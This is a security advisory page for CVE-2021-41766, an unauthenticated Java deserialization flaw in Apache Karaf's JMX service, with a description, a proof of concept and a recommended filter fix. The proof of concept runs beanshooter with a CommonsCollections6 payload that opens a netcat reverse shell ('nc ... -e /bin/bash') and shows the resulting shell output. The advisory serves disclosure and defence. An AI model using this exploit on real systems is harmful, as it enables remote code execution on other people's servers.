{"id":18474,"date":"2022-05-24T16:51:15","date_gmt":"2022-05-24T14:51:15","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2021-0025\/"},"modified":"2022-06-01T17:16:15","modified_gmt":"2022-06-01T15:16:15","slug":"usd-2021-0025","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2021-0025\/","title":{"rendered":"usd-2021-0025"},"content":{"rendered":"\n[et_pb_section fb_built=\"1\" _builder_version=\"4.17.1\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.17.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

usd-2021-0025 (CVE-2021-41766) | Apache Karaf<\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2021-0025<\/span>
CVE Number<\/strong>: <\/span>CVE-2021-41766<\/a>
Product<\/strong>: Apache Karaf
<\/span>Affected Version: <\/strong><= 4.3.2
Vulnerability Type<\/strong>: CWE-502: Deserialization of Untrusted Data<\/span>
Security Risk<\/strong>: High<\/span>
Vendor URL<\/strong>: <\/span>https:\/\/karaf.apache.org\/<\/a>
Vendor Status<\/strong>: Fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX).
JMX is a Java RMI based technology that relies on Java serialized objects for client server communication.
Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation
used by Apache Karaf is not protected against this kind of attack.<\/p>\n

The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets
class path. We did not look for available gadget chains within Apache Karaf and are not aware of any existing chains. However,
deserialization of untrusted data does always represent a high security risk and should be prevented.<\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

To verify the vulnerability one can obtain a binary distribution of Apache Karaf<\/a>.
After unpacking, Karaf can be started by executing .\/bin\/karaf<\/strong>, which drops into an interactive console and starts some
services in the background. One of these services is the JMX service, that is by default listening on port 1099.<\/p>\n

Before the default implementation of JMX was hardened in 2016, it was vulnerable to pre authenticated deserialization attacks.
CVE-2016-3427 was assigned for this vulnerability and it can be exploited by using tools like e.g. beanshooter<\/a>.
As the deserialization vulnerability in Karaf is very similar, we can use beanshooter to verify the vulnerability.<\/p>\n

The following listing shows a corresponding proof of concept. To make the vulnerability exploitable, we copy a library with
known deserialization gadgets to the classpath before starting Karaf. Afterwards, we use beanshooter to obtain code execution:<\/p>\n

Start Karaf:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||29px||false|false\" global_colors_info=\"{}\"]

[user@host apache-karaf-4.3.2]$ cp \/tmp\/commons-collections-3.1.jar lib\/
[user@host apache-karaf-4.3.2]$ .\/bin\/karaf
__ __ ____
\/ \/\/_\/____ __________ _\/ __\/
\/ ,< \/ __ `\/ ___\/ __ `\/ \/_
\/ \/| |\/ \/_\/ \/ \/ \/ \/_\/ \/ __\/
\/_\/ |_|__,_\/_\/ __,_\/_\/<\/p>\n

Apache Karaf (4.3.2)<\/p>\n

Hit '<tab>' for a list of available commands
and '[cmd] --help' for help on a specific command.
Hit '<ctrl-d>' or type 'system:shutdown' or 'logout' to shutdown Karaf.<\/p>\n

karaf@root()><\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.17.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

Exploit with beanshooter:<\/span><\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||29px||false|false\" global_colors_info=\"{}\"]

[user@host apache-karaf-4.3.2]$ beanshooter --bound-name karaf-root 127.0.0.1 1099 cve-2016-3427 CommonsCollections6 \"nc 127.0.0.1 4444 -e \/bin\/bash\"\"
[+] Creating ysoserial payload...done.
[+] cve-2016-3427 - Sending serialized Object as credential.
[+] An SecurityException during the connection attempt is expected.
[+] Connecting to JMX server...
[-] The following exception was thrown: Expected String[2], got java.util.HashSet<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]

Remote Code Execution:<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" custom_margin=\"20px||29px||false|false\" global_colors_info=\"{}\"]

[user@host ~]$ nc -vlp 4444
Ncat: Version 7.91 ( https:\/\/nmap.org\/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:41828.
id
uid=1000(user) gid=1000(user) groups=1000(user)<\/p>[\/et_pb_text][et_pb_text _builder_version=\"4.16\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"][\/et_pb_text][et_pb_text _builder_version=\"4.17.1\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]

\n
\n

Fix<\/h3>\n

To fix the Java deserialization vulnerability, it is recommended to configure an ObjectInputFilter for the JMX service.
This can be done by setting a suitable filter configuration for the jmx.remote.rmi.server.credentials.filter.pattern<\/strong> key that can
be specified within the environment variables when creating a new JMX server instance. A corresponding example can be found
within the current JMX default implementation<\/a>.<\/p>\n

Timeline<\/h3>\n